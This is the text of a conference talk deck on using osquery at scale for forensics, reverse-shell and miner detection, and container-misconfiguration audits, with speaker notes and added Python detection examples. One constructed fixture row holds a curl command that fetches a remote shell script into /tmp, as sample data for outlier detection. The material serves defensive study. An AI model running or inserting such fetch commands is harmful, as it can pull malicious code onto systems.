© 2019 Adobe. All Rights Reserved. Adobe Confidential.
Leveraging Osquery for DFIR at scale
Sohini Mukherjee | Security Researcher @ Adobe
Agenda
• Rapid Incident Response
• Fast Forensics
• Proactive Threat Hunting
2
Needle in a haystack?
• Running processes
• Active network connections
• New user accounts
• Detect file system changes
• Kernel modules loaded
• Evidence of persistence
• Evidence of code injection
• Non-standard running services
3
Can Osquery help?
• Abstracts the OS to SQL (SQLite)
• Open-source, active development
• Cross-platform
• Light-weight agent
• Non-intrusive: user-mode
4
Reference: https://blog.kolide.com/profiling-osquery-performance-with-kolide-cloud-8e01097469db
Some Osquery statements..
5
Osquery Deployment..
6
1. osquery enrolls or polls
2. TLS endpoint responds with a query
3. osquery replies with results
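The three-step exchange above, as an added in-process model (not Kolide Fleet's code and not the deck's). Message fields mirror osquery's TLS remote API (/enroll, /distributed/read, /distributed/write) as I understand it; the server is a stand-in with no network or TLS, and the enroll secret, host name and result rows are constructed.

```python
import secrets

ENROLL_SECRET = "constructed-enroll-secret"   # shared with agents out of band


class TlsEndpoint:
    """Stand-in for the TLS endpoint: enrolls hosts, queues queries, stores results."""

    def __init__(self):
        self.nodes = {}      # node_key -> host_identifier
        self.pending = {}    # host_identifier -> {query_id: sql}
        self.results = {}    # (host_identifier, query_id) -> rows

    def enroll(self, body):
        # Step 1: the agent proves it knows the enroll secret; the server hands
        # back a per-host node_key that authenticates every later call.
        if body.get("enroll_secret") != ENROLL_SECRET:
            return {"node_invalid": True}
        key = secrets.token_hex(16)
        self.nodes[key] = body["host_identifier"]
        return {"node_key": key, "node_invalid": False}

    def schedule(self, host, query_id, sql):
        self.pending.setdefault(host, {})[query_id] = sql

    def distributed_read(self, body):
        # Step 2: a poll carrying a valid node_key is answered with queued queries.
        host = self.nodes.get(body.get("node_key"))
        if host is None:
            return {"node_invalid": True}   # agent should re-enroll
        return {"queries": self.pending.pop(host, {}), "node_invalid": False}

    def distributed_write(self, body):
        # Step 3: the agent posts result rows per query id plus a status per query.
        host = self.nodes.get(body.get("node_key"))
        if host is None:
            return {"node_invalid": True}
        for qid, rows in body["queries"].items():
            self.results[(host, qid)] = rows
        return {"node_invalid": False}


def run_exchange():
    """Drive one agent through enroll -> read -> write; return the server and its node_key."""
    server = TlsEndpoint()
    server.schedule("host-a", "sockets_4444",
                    "select pid from process_open_sockets where remote_port = 4444")
    key = server.enroll({"enroll_secret": ENROLL_SECRET, "host_identifier": "host-a"})["node_key"]
    work = server.distributed_read({"node_key": key})
    rows = {qid: [{"pid": "1800"}] for qid in work["queries"]}   # constructed agent output
    server.distributed_write({"node_key": key, "queries": rows,
                              "statuses": {qid: 0 for qid in rows}})
    return server, key
```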
Kolide Fleet – Open Source Osquery Manager
7
Kolide Fleet Portal
8
@ Scale..
9
Potential Attack Scenarios
Attack Scenario : Reverse Shells
11
12
13
Reverse Shell : Mshta : MITRE [T1170]
14
Reverse Shell : Regsvr32 : MITRE [T1117]
15
Reverse Shell : DLL Injection : MITRE [T1055]
16
DLL Injection: Detections
17
• Pstree with active network sockets
• https://github.com/facebook/osquery/blob/master/specs/processes.table
DLL Injection: Detections
18
• Injection (malicious msf.dll) as seen by process_memory_map table
• https://github.com/facebook/osquery/blob/master/specs/process_memory_map.table
DLL Injection: Evidence gathering
19
• File System Metadata for evidence of time of execution
• https://github.com/facebook/osquery/blob/master/specs/utility/file.table
CryptoMining
20
Attack Scenario
21
1. Attacker authenticates with stolen credentials
2. Attacker establishes alternate access by creating a new user
3. The new user installs and starts the miner
4. The miner establishes a connection to its pool
22
Detection via Kolide Fleet deployment
23
• Suspicious process on a non-standard network socket
• Query:
    select s.pid, p.name, local_address, remote_address, family, protocol, local_port, remote_port
    from process_open_sockets s join processes p on s.pid = p.pid
    where remote_port = 4444
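An added worked example (not from the deck) that runs the slide-23 socket query, the slide-17 "pstree" walk and the slide-18 memory-map check against constructed rows. Because osquery is SQLite underneath, the same SQL runs here over in-memory tables shaped like processes, process_open_sockets and process_memory_map; the pids, paths and addresses are sample data, and the "outside Windows and Program Files" rule for module paths is my own heuristic.

```python
import sqlite3

# Constructed rows shaped like the osquery tables the slides name; not a real host.
PROCESSES = [  # pid, parent, name, path
    (4, 0, "System", ""),
    (900, 4, "explorer.exe", r"C:\Windows\explorer.exe"),
    (1200, 900, "chrome.exe", r"C:\Program Files\Google\Chrome\chrome.exe"),
    (1500, 900, "WINWORD.EXE", r"C:\Program Files\Microsoft Office\WINWORD.EXE"),
    (1800, 1500, "notepad.exe", r"C:\Windows\System32\notepad.exe"),
]
SOCKETS = [  # pid, family (2 = AF_INET), protocol (6 = TCP), local addr, port, remote addr, port
    (1200, 2, 6, "10.0.0.5", 51000, "203.0.113.10", 443),
    (1800, 2, 6, "10.0.0.5", 51002, "198.51.100.7", 4444),
]
MEMORY_MAP = [  # pid, path of a mapped module
    (1800, r"C:\Windows\System32\notepad.exe"),
    (1800, r"C:\Windows\System32\ntdll.dll"),
    (1800, r"C:\Users\alice\AppData\Local\Temp\msf.dll"),
    (1200, r"C:\Windows\System32\kernel32.dll"),
]

# Slide 23's query, with '=' for the integer port instead of LIKE.
SOCKET_QUERY = """
SELECT s.pid, p.name, s.local_address, s.remote_address, s.family, s.protocol,
       s.local_port, s.remote_port
FROM process_open_sockets s JOIN processes p ON s.pid = p.pid
WHERE s.remote_port = 4444"""
# Slide 18: a DLL mapped from outside the Windows and Program Files trees.
MEMMAP_QUERY = r"""
SELECT m.pid, p.name, m.path
FROM process_memory_map m JOIN processes p ON m.pid = p.pid
WHERE m.path LIKE '%.dll'
  AND m.path NOT LIKE 'C:\Windows\%' AND m.path NOT LIKE 'C:\Program Files%'"""

def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE processes(pid INT, parent INT, name TEXT, path TEXT);
        CREATE TABLE process_open_sockets(pid INT, family INT, protocol INT,
            local_address TEXT, local_port INT, remote_address TEXT, remote_port INT);
        CREATE TABLE process_memory_map(pid INT, path TEXT);""")
    db.executemany("INSERT INTO processes VALUES (?,?,?,?)", PROCESSES)
    db.executemany("INSERT INTO process_open_sockets VALUES (?,?,?,?,?,?,?)", SOCKETS)
    db.executemany("INSERT INTO process_memory_map VALUES (?,?)", MEMORY_MAP)
    return db

def pstree(db, pid):
    """Slide 17's 'pstree': follow parent pids from the socket owner up to the root."""
    chain = []
    while (row := db.execute("SELECT parent, name FROM processes WHERE pid = ?", (pid,)).fetchone()):
        chain.append(row[1])
        pid = row[0]
    return chain

def suspicious_sockets(db):
    # (pid, name, remote_address, remote_port, ancestry) for each socket-query hit
    return [(r[0], r[1], r[3], r[7], pstree(db, r[0])) for r in db.execute(SOCKET_QUERY)]

def injected_modules(db):
    return [tuple(r) for r in db.execute(MEMMAP_QUERY)]
```

The ancestry list is what turns a bare port hit into a story: a text editor spawned by an Office process that is talking to port 4444 is a very different finding from the same port on a known admin tool.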
What does it look like in the SIEM?
24
Detection from artifacts
25
Container Exploit
26
Privileged Container / Container escape attempt
27
[Diagram: several containers sharing one host; one of them runs privileged]
Can we detect it?
28
• Container running in privileged mode with the root user without any Security Profiles
Docker queries
• Docker_open_sockets:
29
Container Exploit Scenario
30
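An added example (not the deck's own query) for the audit condition on slide 28 and the outlier idea in the speaker notes for slides 30 and 31, run with sqlite3 over constructed rows. The tables are shaped like osquery's docker_containers (privileged, security_options) and docker_container_processes (pid, uid, name, cmdline); those column names are my reading of the osquery tables, and the container ids, images, command lines and the per-image baseline are all made up for the example.

```python
import sqlite3

# Constructed rows; not real containers.
CONTAINERS = [  # id, name, image, privileged, security_options
    ("aaa111", "web-frontend", "nginx:1.17", 0, "apparmor=docker-default"),
    ("bbb222", "batch-runner", "ubuntu:18.04", 1, ""),
    ("ccc333", "worker", "python:3.7", 0, ""),
]
CONTAINER_PROCESSES = [  # container id, pid inside the container, uid, name, cmdline
    ("aaa111", 1, 101, "nginx", "nginx -g daemon off;"),
    ("bbb222", 1, 0, "bash", "bash run.sh"),
    ("bbb222", 57, 0, "curl", "curl -sL http://203.0.113.9/x.sh -o /tmp/x.sh"),
    ("ccc333", 1, 1000, "python", "python worker.py"),
]
# Known-good baseline per image (the "baseline of known good" from the notes).
BASELINE = {"nginx:1.17": {"nginx"}, "ubuntu:18.04": {"bash"}, "python:3.7": {"python"}}

# Slide 28: privileged mode, root (uid 0 for the container's pid 1), no security profile.
MISCONFIG_QUERY = """
SELECT c.id, c.name, c.image
FROM docker_containers c
JOIN docker_container_processes p ON p.id = c.id AND p.pid = 1
WHERE c.privileged = 1 AND c.security_options = '' AND p.uid = 0"""

def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE docker_containers(id TEXT, name TEXT, image TEXT,
            privileged INT, security_options TEXT);
        CREATE TABLE docker_container_processes(id TEXT, pid INT, uid INT,
            name TEXT, cmdline TEXT);""")
    db.executemany("INSERT INTO docker_containers VALUES (?,?,?,?,?)", CONTAINERS)
    db.executemany("INSERT INTO docker_container_processes VALUES (?,?,?,?,?)",
                   CONTAINER_PROCESSES)
    return db

def misconfigured_containers(db):
    """Containers matching the slide-28 audit condition, as (id, name, image)."""
    return [tuple(r) for r in db.execute(MISCONFIG_QUERY)]

def outlier_processes(db):
    """Processes not in their image's baseline, as (container, image, pid, name, cmdline).
    The curl/wget case from the notes falls out of this without a hard-coded tool list."""
    rows = db.execute("""
        SELECT c.name, c.image, p.pid, p.name, p.cmdline
        FROM docker_container_processes p JOIN docker_containers c ON p.id = c.id
        ORDER BY c.name, p.pid""")
    return [(cname, image, pid, pname, cmd) for cname, image, pid, pname, cmd in rows
            if pname not in BASELINE.get(image, set())]
```

The misconfiguration query is an audit you can run before any compromise; the outlier check is the runtime signal for after one, and both are the same SQL whether the rows come from osquery or an EDR that exposes equivalent data.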
References
• https://osquery.io/
• https://github.com/facebook/osquery
• https://github.com/teoseller/osquery-attck
• https://github.com/polylogyx/osq-ext-bin
• https://github.com/osql/extensions
• https://github.com/gcmurphy/windmill
• https://github.com/osquery/osquery-python
• https://blog.trailofbits.com/2018/05/28/collect-ntfs-forensic-information-with-osquery/
31
Thank You
Leveraging Osquery for DFIR @ Scale _BSidesSF_2020
Editor's Notes

  • #25: Discussion on artifacts
  • #28: Running misconfigured containers in Prod or any environment can lead to vulnerable scenarios, e.g. running privileged containers, running without security restrictions like AppArmor, or containers running as root. An attacker might exploit an application vulnerability, compromise a container and, with enough elevated privileges, break into the underlying host kernel space, and eventually move laterally to other containers sharing the same host kernel space and, say, start running miners in all production containers. Container forensics is challenging, one of the many reasons being the short-lived nature of containers; that is how containers are supposed to be. However, we can audit for these security misconfigurations and remediate them proactively before a compromise actually takes place.
  • #30: We can use more complex osquery statements to audit for Docker open sockets, and as we have seen from our previous examples, open sockets might lead to pretty interesting information. For proactive threat-hunting, we might want to do an outlier analysis beyond a baseline of known good. E.g. a newly seen process is running out of an unexpected file path and reaching out to a first-seen set of IP addresses: not necessarily malicious, but it gives you an interesting subset of information to investigate further. And this is not just related to containers; we can apply the same logic to more conventional environments as well.
  • #31: But what if none of these security flaws were detected or remediated and an attacker has been able to compromise and gain access to a container? Let's try to put ourselves in the attacker's shoes. The attacker might want to download more malicious code into the container, or say, try to install and start running a miner, and he might just use a command like "curl" or "wget" to do so. If this is not a command line that's expected in your runtime environment, that might just give you a very critical heads-up that some anomaly has just happened in your container environment.
  • #32: As we approach the concluding part of the talk, I would want to reiterate that all that we have discussed today is not necessarily limited to just Osquery. We can extrapolate the detection mechanisms and apply them to any commercial EDR tool that you might be running or, even better, build your own framework and open-source it. It's basically unleashing the power of open source and contributing to it, so that we, as a community, can be a step ahead of the bad guys.